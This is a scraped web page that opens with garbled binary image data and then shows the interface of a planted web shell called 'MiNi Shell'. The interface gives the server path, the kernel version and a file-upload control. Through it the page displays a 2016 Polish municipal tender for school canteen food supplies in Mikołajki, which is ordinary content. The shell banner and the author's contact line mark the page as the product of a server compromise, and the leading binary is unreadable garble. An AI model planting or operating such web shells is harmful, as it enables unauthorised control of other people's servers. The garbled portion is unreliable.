JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160115/10942-N-2016.html

<p class="kh_header"><b>Mikołajki: Dostawa artykułów spożywczych do stołówki szkolnej w Mikołajkach</b><br>
<b>Numer ogłoszenia: 10942 - 2016; data zamieszczenia: 15.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mikołajki , ul. Kolejowa 7, 11-730 Mikołajki, woj. warmińsko-mazurskie, tel. 087 4219050, faks 087 4219099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mikolajki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówki szkolnej w Mikołajkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych do stołówki szkolnej w Mikołajkach w okresie od dnia podpisania umowy do 31.12.2016. 1	Amarantus 250g	szt.	50
2	Brokuły mrożone op. min. 2,5kg	kg	100, 
3	Chrzan tarty	kg	5, 
4	Cukier brązowy	kg	200, 
5	Curry	kg	3, 
6	Cynamon	kg	0,5, 
7	Czekolada 100g (minimalna zawartość miazgi kakaowej 75%)	szt.	1100, 
8	Czosnek granulowany	kg	8, 
9	Dziki ryż 200g	szt.	50, 
10	Dżem Łowicz 100% 220g lub równoważny (za równoważny uważamy dżem z 100% zawartością owoców, na 100g dżemu użyto 100g owoców)	szt.	400, 
11	Fasola czerwona konserwowa	kg	25, 
12	Fasola szparagowa, zielona, nie krojona, mrożona op. min 2,5kg	kg	200, 
13	Gałka muszkatałowa mielona	kg	1, 
14	Goździki	kg	0,5, 
15	Groszek mrożony ziarno op. Min. 2,5kg	kg	100, 
16	Groszek zielony konserwowy	kg	10, 
17	Herbata czarna liściasta w saszetkach piramidkach 25szt	szt.	600, 
18	Imbir mielony	kg	1, 
19	Jagody goji suszone 150g	szt.	20, 
20	Jagody mrożone op. Min. 2,5kg	kg	100, 
21	Kakao 100g	szt.	100, 
22	Kalafior mrożony op. min. 2,5kg	kg	150, 
23	Kasza gryczana prażona op. min. 5kg	kg	350, 
24	Kasza jaglana	kg	50, 
25	Kasza jęczmienna średnia op. min 5kg	kg	300, 
26	Kasza kukurydziana 350g	szt.	30, 
27	Kasza manna	kg	50, 
28	Kasza pęczak op. min 5kg	kg	300, 
29	Kawa zbożowa rozpuszczalna 150g	szt.	75, 
30	Ketchup łagodny pudliszki 480g lub równoważny (za ketchup równoważny uważamy ketchup do przygotowania którego zurzyto minimum 193g pomidorów na 100g produktu)	szt.	350, 
31	Kluski śląskie mrożone	kg	150, 
32	Kmin rzymski mielony	kg	2, 
33	Kminek	kg	1, 
34	Kolendra mielona	kg	2, 
35	Kompot w słoiku 0,9l	szt.	5000, 
36	Koncentrat pomidorowy op. min. 0,7kg	szt.	500, 
37	Koperek suszony	kg	4, 
38	Kopytka mrożone	kg	150, 
39	Krem nutella 350g lub równoważny ( za krem równoważny uważamy krem z minimum 13% zawartością orzechów laskowych)	szt.	100, 
40	Ksylitol	szt.	800, 
41	Kukurydza konserwowa	kg	200, 
42	Kurkuma	kg	2, 
43	Kwasek cytrynowy 20g	szt.	200, 
44	Laska wanilii	szt.	200, 
45	Len mielony złoty 200g	szt.	50, 
46	Liść laurowy	kg	3, 
47	Łosoś wędzony na zimno	kg	10, 
48	Majeranek	kg	5, 
49	Majonez słoik 0,9l	szt.	200, 
50	Maka ziemniaczana	kg	50, 
51	Makaron Lubella Conchigliette piccole - Muszelki małe opakowanie min. 400 g lub równoważny (za produkt równoważny uważamy makaron o tych samych cechach organoleptycznych)	kg	200, 
52	Makaron Lubella Eliche Tricolore - Świderki Trzy kolory opakowanie min. 400 g lub równoważny (za produkt równoważny uważamy makaron o tych samych cechach organoleptycznych)	kg	200, 
53	Makaron Lubella Filini -Nitka cięta opakowanie min. 500 g lub równoważny (za produkt równoważny uważamy makaron o tych samych cechach organoleptycznych)	kg	200, 
54	Makaron Lubella Fusilli - Świderki  opakowanie min. 500 g lub równoważny (za produkt równoważny uważamy makaron o tych samych cechach organoleptycznych)	kg	200, 
55	Makaron Lubella Penne rigate - Pióra opakowanie min. 400 g lub równoważny (za produkt równoważny uważamy makaron o tych samych cechach organoleptycznych)	kg	200, 
56	Makaron Lubella Rigati Tricolore - Rurki Trzy kolory opakowanie min. 400g lub równoważny (za produkt równoważny uważamy makaron o tych samych cechach organoleptycznych)	kg	200, 
57	Makaron pełnoziarnisty Lubella Fusilli - Świdry opakowanie min. 400 g lub równoważny (za makaron równoważny uważamy makaron o tych samych cechach organoleptycznych wyprodukowany z mąki pszennej pełnoziarnistej)	kg	200, 
58	Makaron pełnoziarnisty Lubella Penne - Pióra opakowanie min. 400 g lub równoważny (za makaron równoważny uważamy makaron o tych samych cechach organoleptycznych wyprodukowany z mąki pszennej pełnoziarnistej)	kg	200, 
59	Makaron pełnoziarnisty Lubella Spaghetti opakowanie min. 400 g lub równoważny (za makaron równoważny uważamy makaron o tych samych cechach organoleptycznych wyprodukowany z mąki pszennej pełnoziarnistej)	kg	200, 
60	Makrela w pomidorach	szt.	30, 
61	Makrela wędzona	kg	40, 
62	Malina mrożona op. min. 2,5kg	kg	100, 
63	Mąka graham	kg	100, 
64	Mąka pszenna	kg	500, 
65	Mąka żytnia razowa	kg	100, 
66	Mieszanka warzywna mrożona 4-składnikowa (marchew, brokuł, kalafior, fasolka mamut) op. min. 2,5kg	kg	250, 
67	Migdały blanszowane 100g	szt.	150, 
68	Miód lipowy w słoiku0,9l	szt.	100, 
69	Miód wielokwiatowy w słoiku 0,9l	szt.	300, 
70	Morela suszona 100g	szt.	150, 
71	Musztarda francuska 185g	szt.	50, 
72	Musztarda sarepska	kg	10, 
73	Nasiona chia 250g	szt.	50, 
74	Natka pietruszki suszona	kg	4, 
75	Ocet balsamiczny 	l	5, 
76	Ocet jabłkowy	l	25, 
77	Ocet winny biały	l	10, 
78	Olej lniany	l	50, 
79	Olej rzepakowy	l	600, 
80	Olej słonecznikowy	l	100, 
81	Olej z pestek winogron	l	100, 
82	Oliwa z oliwek extra  virgin	l	50, 
83	Oliwki zielone całe w słoiku 0,9l	szt.	30, 
84	Oregano	kg	6, 
85	Orzechy laskowe łuskane 100g	szt.	150, 
86	Orzechy nerkowca 100g	szt.	150, 
87	Orzechy włoskie łuskane 100g	szt.	150, 
88	Otręby owsiane 150g	kg	4, 
89	Otręby pszenne 150g	kg	4, 
90	Otręby żytnie 150g	kg	4, 
91	Papryka mielona	kg	10,
92	Pestki dyni łuskane 100g	szt.	150, 
93	Pieprz biały mielony	kg	3, 
94	Pieprz cytrynowy	kg	5, 
95	Pieprz czarny mielony	kg	8, 
96	Płatki jęczmienne błyskawiczne 1kg	kg	40, 
97	Płatki kukurydziane	kg	50, 
98	Płatki migdała 100g	szt.	75, 
99	Płatki owsiane błyskawiczne 1kg	kg	30, 
100	Płatki ryżowe błyskawiczne 1kg	kg	15, 
101	Polędwica z dorsza	kg	200, 
102	Pomidory krojone w puszce 2,5kg	kg	300, 
103	Powidła śliwkowe Łowicz 290g lub równoważne ( za równoważne powidła uważamy powidła wyprodukowane minimum ze 182g owoców na 100g produktu)	szt.	50, 
104	Pryzprawa do ryb Knorr 0,6kg lub rwnoważna ( za przyprawę równoważną uważamy przyprawę zawierającą w swoim składzie pieprz biały, natkę pietruszki, koperek oraz imbir)	szt.	20, 
105	Quinoa - Komosa ryżowa 250g	szt.	50, 
106	Rodzynki 100g	szt.	150, 
107	Rozmaryn	kg	1, 
108	Ryż brązowy	kg	50, 
109	Ryż paraboiled op. min. 5kg	kg	1000, 
110	Sezam 300g	szt.	75, 
111	Siemię lniane 400g	szt.	15, 
112	Słonecznik łuskany 150g	szt.	150, 
113	Sok marchwiowo-owocowy hortex lub równoważny 1l (za produkt równoważy uważamy sok o minimum 40% zawartości przecierów warzywno-owocowych)	l	3000, 
114	Sok owocowy 100%  1l	l	500, 
115	Sos sojowy naturalnie warzony, sos fermentowany, wytwarzany z ziaren soi, prażonego ziarna ryżu lub pszenicy, wody i soli bez dodatkowych substancji 	l	150, 
116	Sól niskosodowa z magnezem i potasem	kg	300, 
117	Syrop aroniowy łowicz 250ml lub równoważny (za syrop równoważny uważamy syrop o 57% zawartości zagęszczonego soku z aronii) 	szt.	15, 
118	Syrop jagodowy 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 18% zawartości zagęszczonego soku z jagód) 	szt.	30, 
119	Syrop klonowy 100% 500ml	szt.	30, 
120	Syrop malinowy 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 38% zawartości zagęszczonego soku z malin) 	szt.	50, 
121	Syrop z czarnego bzu 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 19% zawartości zagęszczonego soku z czarnego bzu) 	szt.	15,
122	Syrop z dzikej róży 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 57% zawartości zagęszczonego soku z dzikiej róży) 	szt.	50, 
123	Syrop z pędów sosny 250ml łowicz lub równoważny (za syrop równoważny uważamy syrop o 1,36% zawartości extraktu z pędów sosny) 	szt.	15, 
124	Szpinak mrożony siekany op. Min. 2,5kg	kg	200, 
125	Śliwka suszona 100g	szt.	150, 
126	Tilapia filet	kg	2500, 
127	Truskawka mrożona op. Min. 2,5kg	kg	300, 
128	Tuńczyk w zalewie puszka	szt.	50, 
129	Tymianek	kg	3, 
130	Wiśnia mrożona op. Min. 2,5kg	kg	200, 
131	Włoszczyzna mrożona juliena op. Min. 2,5kg	kg	1000, 
132	Woda mineralna op. 1,5l	l	2500, 
133	Zacierka op. Min. 250g	szt.	200, 
134	Zarodki pszenne 150g	kg	5, 
135	Ziele angielskie	kg	5, 
136	Zioła prowansalskie	kg	1, 
137	Żurawina cała w słoiku 300g (minimalna zawartość żurawiny 49%)	szt.	50.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczegółowego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolajki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Mikołajki ul. Kolejowa 7, 11-730 Mikołajki pok. 114.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2016 godzina 09:00, miejsce: Urząd Miasta i Gminy Mikołajki ul. Kolejowa 7, 11-730 Mikołajki pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com